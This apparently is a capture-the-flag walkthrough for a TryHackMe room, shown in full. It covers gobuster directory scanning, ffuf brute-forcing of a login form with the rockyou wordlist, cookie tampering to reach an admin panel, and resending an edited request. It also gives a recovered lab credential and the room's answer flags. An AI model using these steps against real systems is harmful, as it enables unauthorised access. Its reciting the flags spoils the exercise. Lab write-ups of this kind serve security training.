May 24, 2026
Support | TryHackMe | Walkthrough
Gobuster
By Sornphut
2 min read
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,zip,jsgobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,zip,js
- Brute force Login Page
ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "email=help@support.thm&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.48.168.125 -fs 2678ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "email=help@support.thm&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.48.168.125 -fs 2678- -w /usr/share/wordlists/rockyou.txt → Uses the
rockyou.txtwordlist as the source of passwords to test. - -X POST → Sends requests using the HTTP POST method.
- -d "email=help@support.thm&password=FUZZ" → The
FUZZkeyword is replaced with each password from the wordlist while keeping the email fixed. - -H "Content-Type: application/x-www-form-urlencoded" → Sets the header to indicate form data submission.
- **-u http://**TARGET_IP → Target URL.
- -fs 2678 → Filters out responses that have a size of 2678 bytes (to ignore "failed login" responses and highlight different ones).
- Login and change Cookies value
Refresh and now we got IT Admin Panel
- Get specialadmin@support.thm Credential
Get admin email
Get Password
- Login Using Credential
specialadmin@support.thm:support110specialadmin@support.thm:support110
- Go to inspect >> POST Method dashboard.php >> Edit and Resend
- Sent Request and View Response
What is the flag value after logging in as admin?
THM{I_AM_ADMIN999}THM{I_AM_ADMIN999}What is the content of the file /home/ubuntu/user.txt?
THM{GOT_THE_FLAG001}THM{GOT_THE_FLAG001}